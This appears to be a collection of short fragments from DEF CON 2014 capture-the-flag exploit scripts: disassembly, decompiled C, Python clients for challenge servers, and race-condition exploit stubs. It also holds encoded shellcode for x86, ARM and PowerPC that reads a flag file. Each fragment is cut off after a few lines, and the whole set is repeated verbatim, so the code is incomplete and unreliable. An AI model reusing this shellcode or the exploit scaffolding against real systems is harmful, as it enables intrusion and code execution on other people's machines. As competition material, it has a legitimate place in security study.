potetisensei

## sub_8049230.txt
.text:08049230 sub_8049230     proc near               ; DATA XREF: .data:0804C270o
.text:08049230
.text:08049230 dest            = dword ptr -4Ch
.text:08049230 src             = dword ptr -48h
.text:08049230 n               = dword ptr -44h
.text:08049230 var_40          = dword ptr -40h
.text:08049230 s2              = byte ptr -34h
.text:08049230 var_14          = dword ptr -14h
.text:08049230 var_10          = dword ptr -10h
.text:08049230 arg_0           = dword ptr  4

## search.py
from struct import pack
from socket import *
from pwn import process

#p = process("shit")
p = socket(AF_INET, SOCK_STREAM)
p.connect(("shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me", 31337))
print p.recv(4096)

current = [ord(i) for i in ""] #[1] * 31 #list

## retr.c
void retr(char *arg0) {
    char *haystack = arg0;

    if (strstr(haystack, "flag")) {
        char var_370[] = "-Nice try,"
        write_my(var_370);
        return ;
    }

    char *var_10 = ___xpg_basename(haystack);

## solve.py
import time
import socket
from struct import pack, unpack

p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p.connect(('sftp_bf28442aa4ab1a4089ddca16729b29ac.2014.shallweplayaga.me', 115))
#p.connect(('localhost', 115))
print p.recv(4096)
p.send("PASS defcon2014\n")
print p.recv(4096)

## cause_race1.py
import time
import socket

def cause_race():
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #tmp.connect(('localhost', 115))
    tmp.connect(('sftp_bf28442aa4ab1a4089ddca16729b29ac.2014.shallweplayaga.me', 115))
    print tmp.recv(4096)
    tmp.send("PASS defcon2014\n")
    print tmp.recv(4096)

## cause_race2.py
import time
import socket
from struct import *

def cause_race():
    stack = int(raw_input("stack: "),16)
    cookie = int(raw_input("cookie: "),16)
    system = int(raw_input("system: "),16)

    payload = ""

## solve.py
import time
import socket

x86 = '\xbc\x00\x08\x00\x42\xbd\x00\x0e\x00\x42\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xef\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x66\x6c\x61\x67\x00'
armel = ',\xd0\x9f\xe5\x01`\x8f\xe2\x16\xff/\xe1xF\x1c0\x00!\x05\'\x00\xdf\x03\'iF\xff"\x00\xdf\x02\x1c\x04\'\x01 \x00\xdf\x02 \x01\'\x00\xdf/flag\x00\x00\x00\x00\x08\x00B'
armeb = '\xe5\x9f\xd0,\xe2\x8f`\x01\xe1/\xff\x16Fx0\x1c!\x00\'\x05\xdf\x00\'\x03Fi"\xff\xdf\x00\x1c\x02\'\x04 \x01\xdf\x00\x1a\x00\'\x01\xdf\x00/flag\x00\x00\x00B\x00\x08\x00'
ppc = '8 B\x00:\x00\x00\x10|!\x8008!\x08\x00H\x00\x00\x05|h\x02\xa68c\x00D8\x80\x00\x008\x00\x00\x05D\x00\x00\x028\x00\x00\x038\x81\x00\x008\xa0\x00\xffD\x00\x00\x028\xa3\x00\x008\x00\x00\x048\x81\x00\x008`\x00\x01D\x00\x00\x028c\xff\xfd8\x00\x00\x01D\x00\x00\x02/flag\x00\x00\x00'

poly = ''
poly += '\x40\x3f\x04\x40'

## solve.py
from socket import *
from struct import pack

dic = {0: [0], 1: [1, 0, 0, 1, 1, 1], 2: [1, 1, 0, 1, 1, 1, 0], 3: [1, 1, 0, 0, 0, 0, 0, 0], 4: [1, 1, 1, 1, 0, 0, 0, 1, 1], 5: [1, 1, 1, 1, 1, 0, 1, 0, 1, 1], 6: [1, 1, 1, 1, 1, 0, 0, 1, 1], 7: [1, 0, 0, 1, 0, 0, 1], 8: [1, 1, 1, 0, 0, 0, 1, 1], 9: [1, 0, 1, 1, 1, 0, 0, 0, 0, 1], 10: [1, 0, 1, 1, 1, 1, 0, 1, 1], 11: [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1], 12: [1, 1, 0, 0, 1, 0, 1, 1, 1], 13: [1, 0, 1, 0, 0, 1, 1, 0, 1], 14: [1, 1, 1, 0, 1, 0, 0, 1, 1], 15: [1, 1, 1, 0, 0, 0, 0, 1], 16: [1, 1, 1, 0, 0, 0, 1, 0], 17: [1, 1, 1, 0, 0, 0, 0, 0, 1, 1], 18: [1, 1, 1, 1, 1, 0, 1, 1, 1], 19: [1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1], 20: [1, 1, 1, 0, 1, 0, 0, 1, 0], 21: [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0], 22: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1], 23: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0], 24: [1, 0, 1, 0, 0, 1, 1, 1, 1], 25: [1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1], 26: [1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1], 27: [1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1], 28: [1, 1, 0, 0, 0, 1, 1, 1, 1], 29: [1, 0, 1, 0

## search.py
from struct import unpack

stack = []
base_addr = 0x605000
start_addr = 0x60e240

mem = open("hoge.bin").read()
dic = {}

def search_tree(addr, route):

## solve.py
import time
import socket

def calc(sum, buf, i, j):
 ret = ((ord(buf[i/8 + j]) << (i%8))%0x100000000)|((ord(buf[i/8 + j +1]) >> (8 - i%8))%0x100000000)
 ret %= 0x100
 sum |= (ret << (24-j*8));
 return sum;

mem = open("hoge.bin").read()
	.text:08049230 sub_8049230 proc near ; DATA XREF: .data:0804C270o
	.text:08049230
	.text:08049230 dest = dword ptr -4Ch
	.text:08049230 src = dword ptr -48h
	.text:08049230 n = dword ptr -44h
	.text:08049230 var_40 = dword ptr -40h
	.text:08049230 s2 = byte ptr -34h
	.text:08049230 var_14 = dword ptr -14h
	.text:08049230 var_10 = dword ptr -10h
	.text:08049230 arg_0 = dword ptr 4
	from struct import pack
	from socket import *
	from pwn import process

	#p = process("shit")
	p = socket(AF_INET, SOCK_STREAM)
	p.connect(("shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me", 31337))
	print p.recv(4096)

	current = [ord(i) for i in ""] #[1] * 31 #list
	void retr(char *arg0) {
	char *haystack = arg0;

	if (strstr(haystack, "flag")) {
	char var_370[] = "-Nice try,"
	write_my(var_370);
	return ;
	}

	char *var_10 = ___xpg_basename(haystack);
	import time
	import socket
	from struct import pack, unpack

	p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	p.connect(('sftp_bf28442aa4ab1a4089ddca16729b29ac.2014.shallweplayaga.me', 115))
	#p.connect(('localhost', 115))
	print p.recv(4096)
	p.send("PASS defcon2014\n")
	print p.recv(4096)
	import time
	import socket

	def cause_race():
	tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	#tmp.connect(('localhost', 115))
	tmp.connect(('sftp_bf28442aa4ab1a4089ddca16729b29ac.2014.shallweplayaga.me', 115))
	print tmp.recv(4096)
	tmp.send("PASS defcon2014\n")
	print tmp.recv(4096)
	import time
	import socket
	from struct import *

	def cause_race():
	stack = int(raw_input("stack: "),16)
	cookie = int(raw_input("cookie: "),16)
	system = int(raw_input("system: "),16)

	payload = ""
	import time
	import socket

	x86 = '\xbc\x00\x08\x00\x42\xbd\x00\x0e\x00\x42\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xef\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x66\x6c\x61\x67\x00'
	armel = ',\xd0\x9f\xe5\x01`\x8f\xe2\x16\xff/\xe1xF\x1c0\x00!\x05\'\x00\xdf\x03\'iF\xff"\x00\xdf\x02\x1c\x04\'\x01 \x00\xdf\x02 \x01\'\x00\xdf/flag\x00\x00\x00\x00\x08\x00B'
	armeb = '\xe5\x9f\xd0,\xe2\x8f`\x01\xe1/\xff\x16Fx0\x1c!\x00\'\x05\xdf\x00\'\x03Fi"\xff\xdf\x00\x1c\x02\'\x04 \x01\xdf\x00\x1a\x00\'\x01\xdf\x00/flag\x00\x00\x00B\x00\x08\x00'
	ppc = '8 B\x00:\x00\x00\x10\|!\x8008!\x08\x00H\x00\x00\x05\|h\x02\xa68c\x00D8\x80\x00\x008\x00\x00\x05D\x00\x00\x028\x00\x00\x038\x81\x00\x008\xa0\x00\xffD\x00\x00\x028\xa3\x00\x008\x00\x00\x048\x81\x00\x008`\x00\x01D\x00\x00\x028c\xff\xfd8\x00\x00\x01D\x00\x00\x02/flag\x00\x00\x00'

	poly = ''
	poly += '\x40\x3f\x04\x40'
	from socket import *
	from struct import pack

	dic = {0: [0], 1: [1, 0, 0, 1, 1, 1], 2: [1, 1, 0, 1, 1, 1, 0], 3: [1, 1, 0, 0, 0, 0, 0, 0], 4: [1, 1, 1, 1, 0, 0, 0, 1, 1], 5: [1, 1, 1, 1, 1, 0, 1, 0, 1, 1], 6: [1, 1, 1, 1, 1, 0, 0, 1, 1], 7: [1, 0, 0, 1, 0, 0, 1], 8: [1, 1, 1, 0, 0, 0, 1, 1], 9: [1, 0, 1, 1, 1, 0, 0, 0, 0, 1], 10: [1, 0, 1, 1, 1, 1, 0, 1, 1], 11: [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1], 12: [1, 1, 0, 0, 1, 0, 1, 1, 1], 13: [1, 0, 1, 0, 0, 1, 1, 0, 1], 14: [1, 1, 1, 0, 1, 0, 0, 1, 1], 15: [1, 1, 1, 0, 0, 0, 0, 1], 16: [1, 1, 1, 0, 0, 0, 1, 0], 17: [1, 1, 1, 0, 0, 0, 0, 0, 1, 1], 18: [1, 1, 1, 1, 1, 0, 1, 1, 1], 19: [1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1], 20: [1, 1, 1, 0, 1, 0, 0, 1, 0], 21: [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0], 22: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1], 23: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0], 24: [1, 0, 1, 0, 0, 1, 1, 1, 1], 25: [1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1], 26: [1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1], 27: [1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1], 28: [1, 1, 0, 0, 0, 1, 1, 1, 1], 29: [1, 0, 1, 0
	from struct import unpack

	stack = []
	base_addr = 0x605000
	start_addr = 0x60e240

	mem = open("hoge.bin").read()
	dic = {}

	def search_tree(addr, route):
	import time
	import socket

	def calc(sum, buf, i, j):
	ret = ((ord(buf[i/8 + j]) << (i%8))%0x100000000)\|((ord(buf[i/8 + j +1]) >> (8 - i%8))%0x100000000)
	ret %= 0x100
	sum \|= (ret << (24-j*8));
	return sum;

	mem = open("hoge.bin").read()